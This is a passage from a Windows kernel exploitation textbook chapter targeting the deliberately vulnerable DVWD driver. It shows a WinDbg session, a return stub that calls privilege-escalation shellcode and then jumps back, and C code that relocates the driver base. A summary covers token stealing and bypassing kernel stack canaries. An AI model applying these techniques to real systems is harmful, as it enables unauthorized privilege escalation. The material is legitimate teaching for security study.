1: kd> u poi(rsp)-5 L2

fffff880`05ac4137 e830000000 call dvwd!TriggerOverflow (fffff880`05ac416c)

fffff880`05ac413c 8bd8 mov ebx,eax

In the preceding code, we set a breakpoint on the vulnerable function. When the breakpoint is hit, the return address has already been pushed onto the stack. Using the poi operator, which reads pointer-sized data from the specified address, we can identify the correct return address. The next command (u) disassembles the parent function body around the call to the vulnerable function. The stub must be set up to return to the FFFFF88005AC413C address, which holds the instruction following the function call. Since the return address was already popped off the stack when control was transferred to our payload, the stub only has to execute a simple absolute jump (JMP instruction) to that address. Of course, since we cannot debug the target box, we have to build the return address using the ZwQuerySystemInformation() API to get the actual base address of the driver. After we have the base address, we can just relocate the RVA to compute the final address. The final stub will look like this:

CALL ShellcodePrivilegesAdd

MOV R11, fffff88005ac413c

JMP R11
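The address loaded into R11 is obtained in two steps: a signature search over the driver image loaded in user land, followed by a relocation against the kernel load base. The following sketch shows both steps under stated assumptions: the signature bytes are the CALL and MOV opcodes from the WinDbg session above, the image is assumed to be mapped so that offsets equal RVAs, and the sketch_ names and the load base used with them are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Returns the offset of the first occurrence of `sig` inside `image`,
 * or (size_t)-1 when the signature is not present. */
size_t sketch_find_signature(const unsigned char *image, size_t image_len,
                             const unsigned char *sig, size_t sig_len)
{
    assert(image != NULL && sig != NULL && sig_len > 0);
    if (image_len < sig_len)
        return (size_t)-1;
    for (size_t i = 0; i + sig_len <= image_len; i++) {
        if (memcmp(image + i, sig, sig_len) == 0)
            return i;
    }
    return (size_t)-1;
}

/* Absolute kernel address = driver load base + RVA. */
uint64_t sketch_relocate(uint64_t kernel_base, uint64_t rva)
{
    return kernel_base + rva;
}
```

If the signature starts at the CALL opcode (e8 30 00 00 00 followed by 8b d8), the return address is the match offset plus five, the length of the CALL instruction. For example, a hypothetical load base of 0xfffff88005ac0000 combined with an RVA of 0x413c gives the return address seen in the session above.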

Summary

In this chapter, we focused on local Windows kernel exploitation. The chapter was divided into three parts. The first part introduced Windows kernel fundamentals and how to prepare a working environment. The second part showed how to elevate the privileges of an arbitrary process, and the third part explained how to exploit different types of kernel vulnerabilities. Since Windows has gone through a lot of different releases, this chapter focused on two server platforms: Windows Server 2003 32-bit SP2 and Windows Server 2008 R2 64-bit.

Windows is a very interesting operating system, rich with features and protection schemes. Moreover, because Windows is a closed source operating system, it takes a lot of effort to deal with its internal structures and undocumented system behaviors. For those reasons, before we began our analysis, we showed how to set up a typical debugging environment. We introduced how to configure a kernel debugger (WinDbg) as well as how to properly set up the virtual machine that hosts the target vulnerable kernel. Next, we introduced the DVWD package, which contains the deliberately vulnerable code we tried to exploit. Then the chapter covered a few Windows kernel concepts that are important to understand before moving on to exploitation execution.

With that information covered, we moved on to the execution step and discussed the three different ways to elevate the privileges of a target process: SID list patching, Privileges patching, and token stealing. We closed the chapter with a section titled “Practical Windows Exploitation,” where we discussed the exploitation techniques we can use to redirect the control flow of the vulnerable path toward our payload located in user land. We covered how to take control of an arbitrary memory overwrite and how to exploit a stack buffer overflow. In addition, we saw how Windows implements kernel-space protections such as the kernel-space stack canary (kernel /GS) and the runtime protection of critical structures, together with the ability to bypass them.

Endnotes

1. Gates B, 2002. www.microsoft.com/about/companyinformation/timeline/timeline/docs/bp_Trustworthy.rtf.

2. Paget C, 2002. Shatter Attack – How to Break Windows, http://web.archive.org/web/20060904080018/http://security.tombom.co.uk/shatter.html.

3. Eriksson J, Janmar K, Oberg C, 2007. Kernel Wars, http://www.blackhat.com/presentations/bh-europe-07/Eriksson-Janmar/Whitepaper/bh-eu-07-eriksson-WP.pdf.

4. Barta C, 2009. Token Stealing, http://csababarta.com/downloads/Token_stealing.pdf.

5. Santamarta R, 2007. Exploiting Common Flaws in Drivers, http://www.reversemode.com/index.php?option=com_content&task=view&id=38&Itemid=1.

6. Jurczyk M, Coldwind G, 2010. GDT and LDT in Windows kernel vulnerability exploitation, http://vexillium.org/dl.php?call_gate_exploitation.pdf.
